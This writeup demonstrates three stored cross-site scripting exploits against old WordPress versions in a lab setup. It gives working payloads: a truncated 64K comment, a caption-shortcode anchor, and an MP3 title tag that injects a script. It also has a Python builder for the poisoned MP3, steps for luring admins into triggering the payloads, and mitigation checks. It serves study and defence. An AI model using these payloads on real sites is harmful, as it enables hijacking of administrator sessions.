Each of the following exploits was demonstrated using WPDistillery with a stock WordPress image (version 4.2).
This exploit affects WordPress versions 4.2 and earlier (CVE-2015-3440).
Here we take advantage of the fact that there is a 64K limit on the size of a comment. The comment text lives in a MySQL TEXT column, which holds at most 65,535 bytes; in MySQL's non-strict sql_mode (the usual setting at the time) a longer value is not rejected but silently truncated on insert. WordPress sanitizes the comment HTML when it is submitted, not when it is displayed, so a comment that is well-formed when checked can become broken HTML once the database cuts off its tail.
So our goal is to post a comment that passes the sanitizer as written and only becomes malicious after auto-truncation.
- Post a benign comment and get an admin to approve it. With the default discussion settings, later comments from the same author name and e-mail are published without moderation, so the malicious comment will go live on its own.
- Post our malicious comment. The event handler and the style sit inside the quoted title attribute, where the sanitizer sees nothing but a harmless attribute value; the padding pushes the closing quote and the closing tag past the 64K mark, so those are exactly what the truncation removes:
<a title='x onmouseover=alert(unescape(/cookies%20yummy/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
- Wait for an admin to view the page. The link is absolutely positioned to cover the whole viewport, so the first mouse movement fires the handler. =)
Exploit originally discovered by Klikki Oy
This exploit affects WordPress versions 4.2.2 and earlier (CVE-2015-5622).
In this attack we use a flaw in how post content is processed: shortcodes (here the caption shortcode) are expanded after the HTML has already been sanitized, so the expansion can shift the attribute quoting of a tag the sanitizer approved. Once the shortcode inside the href is replaced, the quotes no longer pair up the way the sanitizer saw them, and the onmouseover that was sitting inside the title value becomes an attribute of its own. As long as we have access to an account with contributor privileges, we can create a post in the WYSIWYG editor and submit it for review by an editor or admin. We can also include style attributes to make the link transparent and cover the whole screen, so a mouseover is guaranteed.
- Get contributor privileges and create a post.
- Put our malicious markup, with the shortcode inside the href attribute, in the WYSIWYG editor:
<a href="[caption code=">]</a><a title=" onmouseover=alert('cookies_yum') ">link</a>
- Submit the draft for review and wait for a privileged user to open it. =)
Exploit originally discovered by Klikki Oy
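The two exploits above (the truncated comment and the caption shortcode) share one mechanism: WordPress whitelisted the HTML once, on input, and something that ran later (MySQL truncation on insert, shortcode expansion on output) changed the markup the browser finally received. The following Python script is an added example, not code from this writeup or from WordPress. It models that sequence with a small HTML5-style attribute tokenizer, a hypothetical kses_allows() whitelist standing in for wp_kses, a MySQL TEXT truncation, and a deliberately simplified rendering step. Every function name, the whitelist, the 70,000-character comment length and the shortened alert(1) handlers are assumptions; the rendering model (a stored fragment that is not a complete tag gets its straight quotes turned into curly-quote entities and is wrapped in a paragraph, as the comment output filters of that era did) is a simplification of WordPress behaviour, not a reimplementation of it.

```python
"""Model of the bug class behind CVE-2015-3440 and CVE-2015-5622: HTML is whitelisted
once, on input, and a later step (database truncation, shortcode expansion) rewrites it.
Added example, not WordPress code; all simplifications here are assumptions:
  * kses_allows() stands in for wp_kses and allows only <a href title>;
  * a MySQL TEXT column in non-strict sql_mode keeps the first 65,535 bytes of an INSERT;
  * shortcodes expand on output, and a [caption] with no width expands to nothing."""
import re

MYSQL_TEXT_MAX_BYTES = 65_535
ALLOWED = {"a": {"href", "title"}}
WS = " \t\r\n"
TAG_START = re.compile(r"<([A-Za-z][A-Za-z0-9]*)")
CAPTION = re.compile(r"\[caption\b[^\]]*\]")
# The caption payload from the writeup with a shorter handler (constructed input).
CAPTION_POST = '<a href="[caption code=">]</a><a title=" onmouseover=alert(1) ">link</a>'

def parse_attrs(s, i):
    """Tokenize attributes from s[i] to '>' the way an HTML5 parser does: a quoted value
    runs to its matching quote (even across '<' and '>'), an unquoted one to whitespace
    or '>'.  Returns (attrs, index after '>', input_ended_inside_a_quote)."""
    attrs, n, unterminated = [], len(s), False
    while i < n and s[i] != ">":
        if s[i] in WS + "/":
            i += 1
            continue
        j = i + 1                                   # first char always belongs to the name
        while j < n and s[j] not in WS + "/>=":
            j += 1
        name, value, i = s[i:j].lower(), None, j
        while i < n and s[i] in WS:
            i += 1
        if i < n and s[i] == "=":
            i += 1
            while i < n and s[i] in WS:
                i += 1
            if i < n and s[i] in "\"'":
                k = s.find(s[i], i + 1)
                unterminated = k == -1              # no closing quote before end of input
                value, i = (s[i + 1:], n) if k == -1 else (s[i + 1:k], k + 1)
            else:
                k = i
                while k < n and s[k] not in WS + ">":
                    k += 1
                value, i = s[i:k], k
        attrs.append((name, value))
    return attrs, min(i + 1, n), unterminated

def find_tags(html):
    """Every start tag in html as (name, attrs, unterminated, start, end)."""
    tags, i = [], 0
    while (m := TAG_START.search(html, i)) is not None:
        attrs, end, unterminated = parse_attrs(html, m.end())
        tags.append((m.group(1).lower(), attrs, unterminated, m.start(), end))
        i = end
    return tags

def kses_allows(html):
    """Input-time whitelist check: every tag and every attribute must be allowed."""
    return all(name in ALLOWED and not bad and all(a in ALLOWED[name] for a, _ in attrs)
               for name, attrs, bad, _, _ in find_tags(html))

def event_handlers(html):
    """Attribute names a browser would bind as inline event handlers (on*)."""
    return [a for _, attrs, _, _, _ in find_tags(html) for a, _ in attrs if a.startswith("on")]

def build_long_comment(js="alert(1)", total_len=70_000):
    """The writeup's comment shape: handler inside a quoted title, padding pushes the
    closing quote and the end of the tag past the 64 K boundary."""
    head, tail = f"<a title='x onmouseover={js} ", "'></a>"
    return head + "A" * (total_len - len(head) - len(tail)) + tail

def mysql_text_truncate(text):
    """Non-strict MySQL: the INSERT succeeds and the value is cut to the column size."""
    return text.encode("utf-8")[:MYSQL_TEXT_MAX_BYTES].decode("utf-8", "ignore")

def render_comment(stored):
    """Simplified comment output filters of the time: a fragment that is not a complete
    tag is texturized like text (straight quotes become entities) and wrapped in <p>."""
    if not stored.endswith(">"):
        stored = stored.replace("'", "&#8217;")
    return f"<p>{stored}</p>"

def store_comment_checked(comment):
    """The missing check: enforce the column's byte limit before storing validated text."""
    if len(comment.encode("utf-8")) > MYSQL_TEXT_MAX_BYTES:
        raise ValueError("comment exceeds column capacity; refusing to store")
    return comment

def expand_shortcodes(html, inside_tags=True):
    """Output-time expansion.  inside_tags=True expands a [caption] that begins inside a
    tag like any other (the vulnerable order); inside_tags=False escapes its brackets
    instead, so the tag the whitelist approved is the tag the browser sees."""
    spans = [(s, e) for _, _, _, s, e in find_tags(html)]

    def replace(m):
        if not inside_tags and any(s < m.start() < e for s, e in spans):
            return m.group(0).replace("[", "&#91;").replace("]", "&#93;")
        return ""                                   # [caption] without a width outputs nothing

    return CAPTION.sub(replace, html)
```

Feed build_long_comment() through kses_allows(), mysql_text_truncate() and render_comment(), and CAPTION_POST through kses_allows() and expand_shortcodes(): both inputs are accepted by the whitelist with no event handlers, and both come out of the later step with an onmouseover attribute. store_comment_checked() and expand_shortcodes(..., inside_tags=False) are the two checks that close the gap: enforce the column limit (or strict sql_mode) before storing validated text, and never let a transformation that runs after sanitization rewrite a tag's attributes without re-checking them.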
This exploit affects WordPress versions 3.6.0 to 4.7.2 (CVE-2017-6814).
In this attack we take advantage of WordPress not escaping the ID3 tag metadata it reads from uploaded audio files when it prints them: the playlist shortcode puts the track title into its noscript fallback block verbatim, which is why the payload starts by closing that block. Contributors cannot upload files, so the mp3 has to be uploaded by an editor or admin.
- Edit an mp3's title tag to:
Artist_Name - Song_Name </noscript><script>alert(document.cookie);</script>
- Get an editor or admin to upload the malicious mp3. (The file plays normally and looks like any other; the tag text is only visible to someone who inspects the metadata.)
i) As a contributor you can create a post containing a playlist shortcode, then get an editor or admin to upload the malicious mp3. If they insert it into the playlist, you're done.
ii) Otherwise we just need the mp3 uploaded; we can then find its attachment ID (for instance by enumerating the attachment pages) and insert it into a new post with something like:
[playlist ids="52"]
- Once the mp3 is in a playlist, the script runs for everyone who views the post, the editor or admin who reviews it included.
Exploit originally discovered at The Summer of Pwnage
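As an added example (not code from this writeup or from WordPress), the script below builds such a file in pure Python and shows why the title has to begin with </noscript>: it writes an ID3v2.3 tag with a TIT2 frame holding the payload in front of an MP3 stream, reads it back the way a tag parser would, and renders the title through a hypothetical stand-in for the playlist's noscript fallback, once unescaped as the vulnerable versions did and once escaped. The function names, the renderer's markup and the sample audio bytes are constructed for the example.

```python
"""Build the CVE-2017-6814 style MP3 from the writeup: an ID3v2.3 tag wh ose TIT2 (title)
frame carries the payload, plus a stand-in for the playlist fallback markup that printed
that title inside <noscript> unescaped.  Added example, not WordPress code; the tag
writer and reader, the renderer and the sample bytes are constructed here."""
import html
import re
import struct

PAYLOAD_TITLE = "Artist_Name - Song_Name </noscript><script>alert(document.cookie);</script>"

def syncsafe(n):
    """ID3v2 tag size: four bytes of seven bits each (high bit of every byte clear)."""
    return bytes((n >> (7 * k)) & 0x7F for k in (3, 2, 1, 0))

def unsyncsafe(b):
    """Inverse of syncsafe() for the four size bytes of the tag header."""
    return sum((x & 0x7F) << (7 * (3 - k)) for k, x in enumerate(b[:4]))

def id3v2_tag(title):
    """Minimal ID3v2.3 tag with one TIT2 frame (encoding byte 0 = latin-1)."""
    text = b"\x00" + title.encode("latin-1")
    # ID3v2.3 frame sizes are plain big-endian (only v2.4 makes them syncsafe).
    frame = b"TIT2" + struct.pack(">I", len(text)) + b"\x00\x00" + text
    return b"ID3\x03\x00\x00" + syncsafe(len(frame)) + frame

def tag_mp3(audio, title):
    """Prepend the tag to the audio stream; the audio itself is untouched, so the file
    still plays.  Assumes the input has no ID3v2 tag of its own (strip one first)."""
    return id3v2_tag(title) + audio

def read_title(data):
    """Minimal reader for tags like the one above (a stand-in for the getID3 library
    WordPress uses): returns the TIT2 text, or None when there is no such frame."""
    if data[:3] != b"ID3":
        return None
    pos, end = 10, 10 + unsyncsafe(data[6:10])
    while pos + 10 <= end:
        fid, size = data[pos:pos + 4], struct.unpack(">I", data[pos + 4:pos + 8])[0]
        body = data[pos + 10:pos + 10 + size]
        if fid == b"TIT2" and body[:1] == b"\x00":
            return body[1:].decode("latin-1")
        pos += 10 + size
    return None

def render_playlist_noscript(title, escape):
    """Hypothetical playlist fallback.  escape=False mirrors the bug (title inserted
    verbatim); escape=True is the hardened form: metadata is attacker input, escape it."""
    shown = html.escape(title, quote=True) if escape else title
    return f"<noscript><ol><li>{shown}</li></ol></noscript>"

def script_outside_noscript(markup):
    """With scripting on, a browser treats a <noscript> body as raw text up to the first
    </noscript>, so a <script> only runs if it lands outside one.  True = payload fires."""
    return "<script" in re.sub(r"<noscript>.*?</noscript>", "", markup, flags=re.S)
```

tag_mp3() over the bytes of a real file gives an mp3 that players and uploaders treat as ordinary audio; read_title() returns the payload unchanged, and script_outside_noscript() is the check that tells the two renderings apart: the unescaped fallback leaves a live script tag after the closed noscript block, the escaped one does not.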